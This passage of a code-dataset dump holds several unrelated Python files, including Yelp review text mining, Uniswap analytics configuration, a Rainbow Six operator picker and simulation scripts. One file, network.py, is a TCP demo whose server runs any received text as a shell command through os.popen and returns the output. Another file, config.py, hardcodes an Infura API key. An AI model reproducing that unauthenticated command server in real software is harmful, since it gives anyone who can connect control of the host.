True\n list_words.append((word, dict_[word]))\n\n except Exception as e:\n # print(\"not in sentence : \" + str(e) + \" : \" + str(term_list))\n skip = True\n\n if len(list_words) > 2:\n\n if dict_[term_list[2]] in noun and dict_[term_list[1]] in adj:\n '''\n Let it be !\n '''\n else:\n print(list_words)\n skip = True\n\n for elem in list_words:\n if len(elem[0]) < 3:\n skip = True\n\n if elem[1] in noun:\n nn_count += 1\n\n item = inflect_engine.singular_noun(elem[0])\n if not item:\n item = elem[0]\n nn = item\n l_list.append(item)\n\n elif elem[1] in adj:\n aa_count += 1\n\n l_list.append(elem[0])\n else:\n l_list.append(elem[0])\n\n term_list = l_list\n term_mod = ' '.join(l_list)\n\n object = {\n 'word_pairs': term,\n 'frequency': {\n\n },\n 'noun': nn,\n 'tagged_text': list_words\n }\n\n for item in term_list:\n object['frequency'][item] = 1\n t_list.append(item)\n\n if len(l_list) > 2:\n # print(\"--\", l_list)\n term_mod = term_list[0] + \"-\" + term_list[1] + \" \" + term_list[2]\n\n object['word_pairs'] = term_mod\n object['type'], object['type_score'] = get_type(scored_terms[term])\n object['polarity'] = TextBlob(term_mod).sentiment.polarity\n object['business_id'] = review['business_id']\n object_type = object['type']\n\n # print (object,skip)\n\n if nn_count == 1 and aa_count > 0 and skip is False and nn is not None:\n try:\n obj = ret_data_dict[object['business_id']][object_type][term_mod]\n object['polarity'] = TextBlob(term_mod).sentiment.polarity\n object['type_score'] = (object['type_score'] + obj['type_score'])\n\n for txt in obj['frequency'].keys():\n object['frequency'][txt] += obj['frequency'][txt]\n\n ret_data_dict[object['business_id']][object_type][term_mod] = object\n\n except:\n try:\n ret_data_dict[object['business_id']][object_type][term_mod] = object\n except:\n try:\n oo = ret_data_dict[object['business_id']]\n except:\n ret_data_dict[object['business_id']] = {}\n\n ret_data_dict[object['business_id']][object_type] = {}\n ret_data_dict[object['business_id']][object_type][term_mod] = object\n\n noun_in_t = ret_data_dict[object['business_id']][object_type][term_mod]['noun']\n ret_data_dict[object['business_id']][object_type][term_mod]['noun_frequency'] = \\\n ret_data_dict[object['business_id']][object_type][term_mod]['frequency'][noun_in_t]\n # else:\n # print(\" - \", \"list : \", list_words, \"noun_count : \", nn_count, \"skip : \", skip, \"noun : \", nn,\n # (nn_count == 1 and skip is False and nn is not None)) # , list(review['text'].keys()))\n\n return ret_data_dict\n\n\ndef get_word_pairs(review_list, mongo_connection):\n query = {\n 'review_id': {\n '$in': review_list\n }\n }\n what = {\n 'review_id': 1,\n 'polarity': 1,\n 'score': 1,\n 'business_id': 1,\n 'stars': 1,\n 'tf_idf': 1,\n 'final': 1,\n }\n\n reviews_text = [x['text'] for x in list(mongo_connection.db.yelp_reviews.find(query))]\n\n final_para = []\n for text in reviews_text:\n text = text.lower(). \\\n replace(\"!\", \" \"). \\\n replace('/', \" \"). \\\n replace(\" \", \" \"). \\\n replace(\"\\t\", \" \"). \\\n replace(\"\\n\", \" \"). \\\n replace(\"~\", \" \"). \\\n lstrip()\n\n regex = re.compile('[%s]' % re.escape(string.punctuation))\n text = regex.sub(' ', text)\n text = text.split(\" \")\n\n ret_text = []\n for word in text:\n if len(word) > 1:\n ret_text.append(word)\n final_para.append(ret_text)\n\n text_tagged = nltk.pos_tag_sents(final_para)\n\n dict_ = {}\n for texxt in text_tagged:\n for word in texxt:\n dict_[word[0]] = word[1]\n # pp.pprint(dict_)\n\n processed = list(mongo_connection.db.yelp_review_scored_pair_all_not_final.find(query, what))\n\n ret_list = {}\n for review in processed:\n ret_list = for_each_review_(review, ret_list, dict_)\n\n ret_list['business_es'] = list(ret_list.keys())\n\n return ret_list\n\n\ndef create_groups(data_types):\n ret_dict = {}\n nouns = []\n for key in data_types.keys():\n\n obj = data_types[key]\n noun_key = obj['noun']\n\n skip = False\n\n if noun_key in ret_dict.keys():\n if ret_dict[noun_key]['count'] > 9:\n skip = True\n\n if skip is False:\n if noun_key in ret_dict.keys():\n ret_dict[noun_key]['count'] += obj['noun_frequency']\n ret_dict[noun_key]['polarity'] += obj['polarity']\n ret_dict[noun_key]['objects'].append(obj)\n else:\n ret_dict[noun_key] = {\n 'count': obj['noun_frequency'],\n 'objects': [obj],\n 'polarity': obj['polarity'],\n 'noun': noun_key\n }\n\n nouns.append(obj['noun'])\n\n final_ret = []\n for key in ret_dict.keys():\n # if (ret_dict[key]['count'] > 1) and (ret_dict[key]['polarity'] < -0.1 or ret_dict[key]['polarity'] > 0.1):\n ret_dict[key]['objects'] = sorted(ret_dict[key]['objects'], key=lambda x: x['noun_frequency'], reverse=True)\n ret_dict[key]['polarity'] = ret_dict[key]['polarity'] / len(ret_dict[key]['objects'])\n\n final_ret.append(ret_dict[key])\n\n final_ret = sorted(final_ret, key=lambda x: x['count'], reverse=True)\n return final_ret\n","sub_path":"server/mod_api/get_word_pairs.py","file_name":"get_word_pairs.py","file_ext":"py","file_size_in_byte":7851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"467258443","text":"# _*_coding:utf-8_*_\n# TCP UDP\n# tcp 三次握手 类似打电话\n\nimport _thread\nimport os\nimport socket\nimport threading\n\nthreadLock = threading.Lock()\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, isServer):\n threading.Thread.__init__(self)\n self.isServer = isServer\n if isServer:\n self.server = socket.socket()\n else:\n self.client = socket.socket()\n\n def run(self):\n if self.isServer:\n self.server.bind(('127.0.0.1', 8995))\n self.server.listen()\n con, addr = self.server.accept()\n while 1:\n # threadLock.acquire()\n data = con.recv(1024)\n print(\"server recv \", data.decode('utf-8'))\n ret = os.popen(data.decode('utf-8'))\n msg = ret.read()\n if not msg.strip(): msg = \"ok\"\n con.send(msg.encode('utf-8'))\n # threadLock.release()\n\n else:\n self.client.connect(('127.0.0.1', 8995))\n while 1:\n # threadLock.acquire()\n msg = input(\"客户传送:\").strip()\n self.client.send(msg.encode())\n data = self.client.recv(10240)\n print(data.decode('utf-8'))\n # threadLock.release()\n\n\nthread1 = MyThread(True)\nthread2 = MyThread(False)\n# 线程不行,需要使用进程\nthread1.start()\nthread2.start()\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"457943915","text":"\"\"\"These tests make actual orders on the Bodega infrastructure.\n\nThey are not meant to be tested in an automated fashion.\n\"\"\"\n\nimport json\nimport logging\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) # noqa\nSCRIPT_NAME = os.path.basename(__file__) # noqa\nSDMAIN_ROOT = \\\n os.path.abspath(os.path.join(SCRIPT_DIR, '..', '..', '..')) # noqa\n\nfrom bodega_commands import BodegaCommands\n\nlog = logging.getLogger(os.path.basename(__name__))\n\n\ndef test_place_order(commands):\n requirements = {\n \"nickname_0\": {\n \"type\": \"rktest_yml\",\n \"requirements\": {\n \"platform\": \"DYNAPOD\"\n }\n },\n }\n order_sid = commands.place_order(requirements)[0]\n assert order_sid\n return order_sid\n\n\ndef test_close_order(commands, order_sid):\n assert commands.close_order(order_sid)\n\n\ndef test_describe_order(commands, order_sid):\n result = json.dumps(commands.describe_order(order_sid), indent=4,\n sort_keys=True)\n log.info(result)\n assert result\n\n\ndef test_extend_order(commands, order_sid):\n result = json.dumps(commands.extend_order(order_sid), indent=4,\n sort_keys=True)\n log.info(result)\n assert result\n\n\ndef test_raw_request(commands):\n result = json.dumps(commands.raw_request('GET', '/profile/'), indent=4,\n sort_keys=True)\n log.info(result)\n assert result\n\n\ndef test_list_orders(commands):\n user_profile = commands.get_current_user_profile()\n result = commands.list_orders(user_email=user_profile['email'],\n status='LIVE')\n result = json.dumps(result, indent=4, sort_keys=True)\n log.info(result)\n assert result\n\nif __name__ == '__main__':\n commands = BodegaCommands()\n\n order_sid = test_place_order(commands)\n test_describe_order(commands, order_sid)\n test_list_orders(commands)\n test_extend_order(commands, order_sid)\n test_close_order(commands, order_sid)\n test_raw_request(commands)\n","sub_path":"lab/bodega/client/bodega_commands_test.py","file_name":"bodega_commands_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280511749","text":"import json\nimport os\nfrom multiprocessing.pool import ThreadPool\nfrom web3 import Web3, IPCProvider\n\nfrom custom_http_provider import CustomHTTPProvider\n\nINFURA_ADDRESS = 'https://mainnet.infura.io/v3/4facf9a657054a2287e6a4bec21046a3'\nDEFAULT_REQUEST_TIMEOUT = 30\n\nweb3_infura = Web3(CustomHTTPProvider(endpoint_uri=INFURA_ADDRESS, request_kwargs={'timeout': DEFAULT_REQUEST_TIMEOUT}))\n\nweb3 = Web3(IPCProvider())\n\nETH = 10 ** 18\n\nUNISWAP_BEGIN_BLOCK = 6627917\n\nHISTORY_BEGIN_BLOCK = 6628000\n\nHISTORY_CHUNK_SIZE = 5000\n\nREORG_PROTECTION_BLOCKS_COUNT = 50\n\nCURRENT_BLOCK = web3.eth.blockNumber - REORG_PROTECTION_BLOCKS_COUNT\n\nLOGS_BLOCKS_CHUNK = 1000\n\nTHREADS = 8\n\npool = ThreadPool(THREADS)\n\nwith open('abi/uniswap_factory.abi') as in_f:\n UNISWAP_FACTORY_ABI = json.load(in_f)\n\nwith open('abi/uniswap_exchange.abi') as in_f:\n UNISWAP_EXCHANGE_ABI = json.load(in_f)\n\nwith open('abi/erc_20.abi') as in_f:\n ERC_20_ABI = json.load(in_f)\n\nwith open('abi/str_erc_20.abi') as in_f:\n STR_ERC_20_ABI = json.load(in_f)\n\nwith open('abi/str_caps_erc_20.abi') as in_f:\n STR_CAPS_ERC_20_ABI = json.load(in_f)\n\nUNISWAP_FACTORY_ADDRESS = '0xc0a47dFe034B400B47bDaD5FecDa2621de6c4d95'\n\nuniswap_factory = web3.eth.contract(abi=UNISWAP_FACTORY_ABI, address=UNISWAP_FACTORY_ADDRESS)\n\nHARDCODED_INFO = {\n '0xE0B7927c4aF23765Cb51314A0E0521A9645F0E2A': ('DGD', 'DGD', 9),\n '0xBB9bc244D798123fDe783fCc1C72d3Bb8C189413': ('TheDAO', 'TheDAO', 16),\n '0x42456D7084eacF4083f1140d3229471bbA2949A8': ('Synth sETH', 'sETH old', 18),\n '0x89d24A6b4CcB1B6fAA2625fE562bDD9a23260359': ('Sai Stablecoin v1.0', 'SAI', 18),\n}\n\nDIST_DIR = '../dist/uniswap/'\n\nLIQUIDITY_DATA = os.path.join(DIST_DIR, 'data/liquidity.csv')\n\nPROVIDERS_DATA = os.path.join(DIST_DIR, 'data/providers/{}.csv')\n\nROI_DATA = os.path.join(DIST_DIR, 'data/roi/{}.csv')\n\nVOLUME_DATA = os.path.join(DIST_DIR, 'data/volume/{}.csv')\n\nTOTAL_VOLUME_DATA = os.path.join(DIST_DIR, 'data/total_volume.csv')\n\nTOKENS_DATA = os.path.join(DIST_DIR, 'data/tokens.json')\n\nEVENT_TRANSFER = '0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'\n\nEVENT_TOKEN_PURCHASE = '0xcd60aa75dea3072fbc07ae6d7d856b5dc5f4eee88854f5b4abf7b680ef8bc50f'\n\nEVENT_ETH_PURCHASE = '0x7f4091b46c33e918a0f3aa42307641d17bb67029427a5369e54b353984238705'\n\nEVENT_ADD_LIQUIDITY = '0x06239653922ac7bea6aa2b19dc486b9361821d37712eb796adfd38d81de278ca'\n\nEVENT_REMOVE_LIQUIDITY = '0x0fbf06c058b90cb038a618f8c2acbf6145f8b3570fd1fa56abb8f0f3f05b36e8'\n\nALL_EVENTS = [EVENT_TRANSFER, EVENT_TOKEN_PURCHASE, EVENT_ETH_PURCHASE, EVENT_ADD_LIQUIDITY, EVENT_REMOVE_LIQUIDITY]\n\nINFOS_DUMP = 'infos.dump'\n\nLAST_BLOCK_DUMP = 'last_block.dump'\n\nGRAPHQL_LOGS_QUERY = '''\n{{\n logs(filter: {{fromBlock: {fromBlock}, toBlock: {toBlock}, addresses: {addresses}, topics: {topics}}}) {{\n data account {{ address }} topics index transaction {{ block {{ number }} }}\n }}\n}}'''\n\nGRAPHQL_ENDPOINT = 'http://localhost:8547/graphql'\n","sub_path":"uniswap/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"624265699","text":"import numpy as np\nspeed = np.loadtxt(r'C:\\Users\\CDT\\Desktop\\GUTS\\MSTanks\\speed.csv', delimiter=',')\nspeed2 = np.loadtxt(r'C:\\Users\\CDT\\Desktop\\GUTS\\MSTanks\\speed2.csv', delimiter=',')\nrotation = np.loadtxt(r'C:\\Users\\CDT\\Desktop\\GUTS\\MSTanks\\rotation.csv', delimiter=',')\nd = np.sqrt(((speed[16,0] - speed[0,0])**2) + ((speed[16,1]-speed[0,1])**2))\nd2 = np.sqrt(((speed2[16,0] - speed2[0,0])**2) + ((speed2[16,1]-speed2[0,1])**2))\ntimebetweenpol = 0.358853\nv = d / (16* timebetweenpol)\nv2 = d2 / (16* timebetweenpol)\navv = (v2 + v)/2\n\navpolltime = np.mean(rotation[:,2])\navrotperpoll = rotation[:,3]\n\nfor i in range(len(avrotperpoll)):\n if avrotperpoll[i] < 0:\n avrotperpoll[i] = avrotperpoll[i] + 360\n print(avrotperpoll[i])\n\ndegreepersecond = np.mean(avrotperpoll /0.358853)\n\n\n","sub_path":"speedrotation.py","file_name":"speedrotation.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"520267945","text":"import math\nfrom optparse import OptionParser\nfrom collections import namedtuple\n\npoint = namedtuple('Point', 'x, y')\n\n\n# Длинные читабельные имена функций это хорошо.\n# Короткие не очень читаьбельные - плохо\ndef dist(a, b):\n \"\"\"Calculate distance between two points: a and b.\"\"\"\n return math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)\n\n\ndef mycartesian_product(some_list):\n \"\"\"Get cartesian product of a list with itself.\"\"\"\n pr = [] # Плохое имя\n for ind, item1 in enumerate(some_list[:-1], start=1):\n for item2 in some_list[ind:]:\n pr.append((item1, item2))\n\n return pr\n\n\ndef xy_from_file(filename):\n \"\"\"Read in point coordinates from a given file.\"\"\"\n with open(filename) as fobj:\n content = fobj.readlines()\n\n try:\n # ValueError может быть пойман только в момент выполннеия float(number)\n # Потому в try...except лучше заключить только его\n splited = [line.split() for line in content]\n points = [point(float(x), float(y)) for x, y in splited]\n except ValueError:\n return None\n\n return points\n\n\ndef main(filename='test_file.txt'):\n \"\"\"Main function.\"\"\"\n points = xy_from_file(filename)\n cartesian_prod = mycartesian_product(points)\n distances = [dist(p1, p2) for p1, p2 in cartesian_prod]\n\n min_ = min(distances)\n max_ = max(distances)\n\n print('min: %s\\nmax: %s' % (min_, max_))\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n opts, args = parser.parse_args()\n if not args:\n main()\n else:\n main(args[0])\n","sub_path":"homeworks/vlad_yan/1__4__distance/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"212015080","text":"''' File that sets up the parameters for the simulation to be run.\n This is the file that controls the distribution of labeled datapoints\n that both algorithms see, and also the action set with which EXP3 is run.\n'''\n\nimport numpy as np\nimport random\nimport math\nfrom copy import deepcopy\nfrom grinding_polytopes import * \nimport polytope as pc\nimport logging\nlogging.basicConfig()\n\ndef set_params(T, eps_exp3): \n np.random.seed()\n d = 2 # dimension of space\n p = 0.7 \n # variable is controlled by the outside file\n delta = 0.05 #radius of best-responses -- implicitly affects regret\n agent_type = [0]*T\n\n \n agent_type = np.random.binomial(1,p,T)\n\n true_labels = [1 if agent_type[i] else -1 for i in range(T)] \n\n #original feature vectors for agents\n x_real = []\n for i in range(T):\n if agent_type[i]:\n x_real.append(np.array([np.random.normal(0.6, 0.4), np.random.normal(0.4,0.6), 1]))\n else:\n x_real.append(np.array([np.random.normal(0.4, 0.6), np.random.uniform(0.6,0.4), 1]))\n\n calA_size_exp3 = 1000\n\n noise = []\n\n initial = []\n zero = np.array([0, 0, 1])\n one = np.array([1, 1, 1])\n curr_size = 0\n\n while curr_size < calA_size_exp3:\n temp = np.array([np.random.uniform(-1,1), np.random.uniform(-1,1), np.random.uniform(-1,1)])\n dist0 = np.abs(1.0*np.dot(temp,zero)/np.linalg.norm(temp[:d])) \n dist1 = np.abs(1.0*np.dot(temp,one)/np.linalg.norm(temp[:d])) \n if dist0 <= np.sqrt(2) and dist1 <= np.sqrt(2):\n initial.append(temp)\n curr_size += 1\n\n\n calA_size = len(initial)\n\n # construct initial polytope, i.e., [-1,1]^{d+1}\n V = np.array([ np.array([-1, -1, -1]), \n np.array([-1, -1, 1]),\n np.array([-1, 1, -1]),\n np.array([-1, 1, 1]),\n np.array([ 1, -1, -1]),\n np.array([ 1, -1, 1]),\n np.array([ 1, 1, -1]),\n np.array([ 1, 1, 1])])\n\n p_init = pc.qhull(V)\n\n # start with a prob and weight of 1 for the org polytope\n calA_exp3 = [init/np.linalg.norm(init[:d]) for init in initial]\n updated = [0]*T\n initial_polytope = Grind_Polytope(p_init, 1.0, 1.0, 2, T, 0.0, 0.0, updated)\n calA_grind = [initial_polytope] \n\n return (T, d, x_real, calA_exp3, calA_grind, agent_type, true_labels, delta, noise, p)\n \n\n","sub_path":"cont_code/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"531244074","text":"import logging\n\nfrom ..models import Stack, Service\nfrom ..utils import log_get_or_create\n\n\nlogger = logging.getLogger(__name__)\n\n\nROLE_GUESSES = dict(\n postgres='database',\n sql='database',\n mariadb='database',\n mongo='database',\n memcache='cache',\n redis='cache',\n celery='worker',\n worker='worker',\n api='backend',\n frontend='frontend',\n web='backend',\n)\n\nDEFAULT_ROLE = 'backend'\n\n\ndef guess_role_from(item):\n \"\"\"\n >>> guess_role_from('registry.plat2.leonidasoy.fi/leonidas2017-mariadb')\n 'database'\n \"\"\"\n for role_guess, guessed_role in ROLE_GUESSES.items():\n if role_guess in item:\n return guessed_role\n\n\ndef guess_role(service_slug, service_dict, default_role=DEFAULT_ROLE):\n \"\"\"\n Tries to guess role first from service_slug and then service_dict['image'].\n \"\"\"\n role = guess_role_from(service_slug)\n if role:\n return role\n\n role = guess_role_from(service_dict.get('image', ''))\n if role:\n return role\n\n return default_role\n\n\ndef env_list_to_dict(env_list):\n \"\"\"\n >>> env_list_to_dict(['KONTENA_LB_MODE=http', 'KONTENA_LB_VIRTUAL_HOSTS=leonidasoy.fi'])\n {'KONTENA_LB_MODE': 'http', 'KONTENA_LB_VIRTUAL_HOSTS': 'leonidasoy.fi'}\n \"\"\"\n return dict(env_item.split('=', 1) for env_item in env_list)\n\n\ndef get_service_env(service_dict, env_name, default=None):\n environment = service_dict.get('environment', dict())\n\n if isinstance(environment, list):\n environment = env_list_to_dict(environment)\n\n return environment.get(env_name, default)\n\n\ndef import_stack(stack_slug, stack_dict, project, grid, environment='staging'):\n stack, created = Stack.objects.get_or_create(\n slug=stack_slug,\n defaults=dict(\n name=stack_slug,\n project=project,\n grid=grid,\n environment=environment,\n description=stack_dict.get('description', ''),\n )\n )\n\n log_get_or_create(logger, stack, created)\n\n for service_slug, service_dict in stack_dict['services'].items():\n role = guess_role(service_slug, service_dict)\n hostnames = get_service_env(service_dict, 'KONTENA_LB_VIRTUAL_HOSTS', '').split()\n hostname = hostnames[0] if hostnames else ''\n\n service, created = Service.objects.get_or_create(\n stack=stack,\n slug=service_slug,\n defaults=dict(\n name=service_slug,\n description=service_dict.get('description', ''),\n role=role,\n hostname=hostname,\n )\n )\n\n log_get_or_create(logger, service, created)\n\n return stack\n","sub_path":"cmdb/importers/kontena.py","file_name":"kontena.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"31604935","text":"from subprocess import check_output\n\n\ndef get_armada_host_ip():\n output = check_output(['ip', 'route']).decode()\n for line in output.splitlines():\n if line.startswith('default'):\n return line.split()[2]\n return '172.17.0.1'\n\n\nARMADA_API_URL = 'http://{}:8900'.format(get_armada_host_ip())\n","sub_path":"docker-containers/microservice/packaging/microservice/opt/microservice/microservice/defines.py","file_name":"defines.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319651981","text":"import enum\nimport json\nimport os\nimport random\n\nfrom typing import Dict, List\n\n\nUSER_DATA_JSON = \"user_data.json\"\n\nR6_ATK = [\n \"Sledge\",\n \"Thatcher\",\n \"Ash\",\n \"Thermite\",\n \"Mick\",\n \"Tick\",\n \"Blitz\",\n \"IQ\",\n \"Fuze\",\n \"Glaz\",\n \"Buck\",\n \"Blackbeard\",\n \"Capitao\",\n \"Hibana\",\n \"Jackal\",\n \"Ying\",\n \"Zofia\",\n \"Dokkaebi\",\n \"Finka\",\n \"Lion\",\n \"Maverick\",\n \"Nomad\",\n \"Gridlock\",\n \"Spooky bitch atk\",\n \"Amaru\",\n \"Kali\",\n]\nR6_DEF = [\n \"Mute\",\n \"Smonk\",\n \"Castle\",\n \"Pulse\",\n \"Dick\",\n \"Rick\",\n \"Jager\",\n \"Bandit\",\n \"God\",\n \"Kapkan\",\n \"Frost\",\n \"Valkyrie\",\n \"Spooky bitch def\",\n \"Echo\",\n \"Mira\",\n \"Lesion\",\n \"Ela\",\n \"Vigil\",\n \"Alibi\",\n \"Maestro\",\n \"Clash\",\n \"Kaid\",\n \"Mozzie\",\n \"Warden\",\n \"Goyo\",\n \"Wamai\",\n]\n\n\nclass OperatorSide(enum.Enum):\n ATTACK = 0\n DEFENSE = 1\n\n\ndef _init():\n if not os.path.exists(USER_DATA_JSON):\n with open(USER_DATA_JSON, \"w\") as f:\n f.write(\"{}\")\n\n\ndef _get_valid_ops(side: OperatorSide, user_id: str) -> List[str]:\n with open(USER_DATA_JSON) as f:\n disabled_ops = json.load(f)\n\n if user_id not in disabled_ops:\n disabled_ops[user_id] = []\n\n with open(USER_DATA_JSON, \"w\") as f:\n json.dump(disabled_ops, f)\n\n if side == OperatorSide.ATTACK:\n possible_ops = R6_ATK\n else:\n possible_ops = R6_DEF\n return [op for op in possible_ops if op.lower() not in disabled_ops[user_id]]\n\n\ndef pick_attackers(user_id: int, num: int) -> List[str]:\n ops = _get_valid_ops(OperatorSide.ATTACK, str(user_id))\n return random.sample(ops, num)\n\n\ndef pick_defenders(user_id: int, num: int) -> List[str]:\n ops = _get_valid_ops(OperatorSide.DEFENSE, str(user_id))\n return random.sample(ops, num)\n\n\ndef disable_operators(user_id: int, ops: List[str]) -> List[str]:\n ops = [op.lower() for op in ops]\n user_str = str(user_id)\n with open(USER_DATA_JSON) as f:\n operators = json.load(f)\n disabled_ops = set(operators.get(user_str, [])) | set(ops)\n operators[user_str] = list(disabled_ops)\n\n with open(USER_DATA_JSON, \"w\") as f:\n json.dump(operators, f)\n return sorted(op.title() for op in operators[user_str])\n\n\ndef enable_operators(user_id: int, ops: List[str]) -> List[str]:\n ops = [op.lower() for op in ops]\n user_str = str(user_id)\n with open(USER_DATA_JSON) as f:\n operators = json.load(f)\n disabled_ops = set(operators.get(user_str, [])) - set(ops)\n operators[user_str] = list(disabled_ops)\n\n with open(USER_DATA_JSON, \"w\") as f:\n json.dump(operators, f)\n return sorted(op.title() for op in operators[user_str])\n\n\ndef get_available_ops(user_id: int) -> Dict[OperatorSide, List[str]]:\n user_str = str(user_id)\n return {\n OperatorSide.ATTACK: _get_valid_ops(OperatorSide.ATTACK, user_str),\n OperatorSide.DEFENSE: _get_valid_ops(OperatorSide.DEFENSE, user_str),\n }\n\n_init()\n","sub_path":"r6_helper.py","file_name":"r6_helper.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"138009203","text":"#!/usr/bin/env python\n#author: lizhen\n#date:\nimport userlog\nimport login\nimport tools\n\n\n#统计消费, 并写入记录\ndef compute_jine(shopping):\n '''\n shopping: 物品 单价 数量\n '''\n all_money = 0\n zongshu = {}\n for i in shopping:\n if zongshu.get(i[0]): #已购买\n zongshu[i[0]] = [i[1], zongshu[i[0]][1]+ i[2]]\n else:\n zongshu[i[0]] = [i[1], i[2]]\n print(\"您此次的消费记录:\".center(50,'*'))\n for k in zongshu:\n print(\"\\t\\t%s %s %s \" % (k, zongshu[k][1], zongshu[k][0]*zongshu[k][1]))\n all_money += zongshu[k][0]*zongshu[k][1]\n print(\"\".center(50, '*'))\n return all_money\n\n#购物清单, 和 购物操作\ndef menu_list(currentuser):\n exit_flag = False\n shopping_list = []\n gongzi = login.get_balance(currentuser)\n menu = (\n ('家电类',('洗衣机',2000),('台式机(dell)',5600),('mac',8000)),\n ('手机类',('华为',3400), ('小米',2200),('联想',500)),\n ('衣服类', ('皮甲',500),('短裤', 100),('连衣裙', 340)),\n\n )\n while not exit_flag:\n for i in range(len(menu)):\n print(\"%s. %s\" % (i, menu[i][0]))\n selected_cls = input(\"购买类型[(Q)uit,(B)ack,[S]how:\") .strip()\n if selected_cls == '':\n continue\n if selected_cls.lower() == 's':\n compute_jine(shopping_list)\n continue\n if selected_cls.lower() == 'q':\n print(\"正在退出系统........\")\n #此处 需要查看用户是否已购买物品\n if len(shopping_list) != 0:\n sum_money = compute_jine(shopping_list)\n tools.write_money(currentuser, sum_money)\n else:\n exit(0)\n elif selected_cls.lower() == 'b':\n sum_money = compute_jine(shopping_list)\n tools.write_money(currentuser, sum_money)\n exit_flag = True\n\n elif selected_cls.isdigit() and int(selected_cls) < len(menu):\n w_flag = False\n wuping = menu[int(selected_cls)][1:]\n\n while not w_flag:\n for j in range(len(wuping)):\n print(\"%s. %s %s\" % (j, wuping[j][0], wuping[j][1]))\n selected_wp = input(\"购买物品[(Q)uit,(B)ack,[S]how][%s]: \" % ( menu[int(selected_cls)][0] )).strip()\n if selected_wp == '':\n continue\n if selected_wp.lower() == 's':\n compute_jine(shopping_list)\n continue\n if selected_wp.lower() == 'q':\n print(\"正在退出系统......\")\n #此处 需要查看用户是否已购买物品\n if len(shopping_list) != 0:\n sum_money = compute_jine(shopping_list)\n tools.write_money(currentuser, sum_money)\n exit(0)\n elif selected_wp.lower() == 'b':\n w_flag = True\n elif selected_wp.isdigit() and int(selected_wp) < len(wuping):\n print(\"您购买了 [%s],请输入购买数量(默认1)\" % wuping[int(selected_wp) ][0],end=' ')\n shuliang = input()\n if shuliang.isdigit():\n shuliang = int(shuliang)\n else:\n shuliang = 1\n # 计算总钱数, 判断 当前剩余的钱是否 足够购买\n # ���加购物车信息\n zongqian = wuping[int(selected_wp)][1] * shuliang\n if zongqian <= gongzi:\n #wuping[int(selected_wp)格式: 名称 单价\n shopping = (wuping[int(selected_wp)][0], wuping[int(selected_wp)][1], shuliang)\n userlog.shop_log(currentuser, shopping)\n shopping_list.append( shopping )\n gongzi -= zongqian\n #print(shopping_list)\n else:\n print(\"您当前的余额为 %s,请去努力工作吧.\" % gongzi)\n\n else:\n print(\"无法识别您的输入,请不要调戏\")\n continue\n else:\n print(\"无法识别您的输入,请不要调戏\")\n continue\n return shopping_list\n\n\n\nif __name__ == \"__main__\":\n menu_list('lizhen', 200000)","sub_path":"day2/homework/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"386310800","text":"# Enrichment_Report.py\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom functions import *\r\n\r\ndef main():\r\n \r\n Enrichment_Time_Table = \"\"\"{| class=\"wikitable\"\r\n!colspan=\"3\" style=\"background: #7fffd4| Enrichment Time\r\n|-\r\n! Date !! Days !! % On Time\r\n\"\"\" \r\n \r\n for i, b in enumerate(run_sql_statement('Enrichment_Time')):\r\n if i == 0:\r\n try:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n except:\r\n try:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || 0 || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\" \r\n except:\r\n try:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" ||0\r\n\"\"\" \r\n except:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Yesterday || 0 ||0\r\n\"\"\" \r\n\r\n if i == 1:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Last Week || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 2:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| MTD || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 3:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Last Month || \"\"\" + \"{0:.1f}\".format(b[1]) + 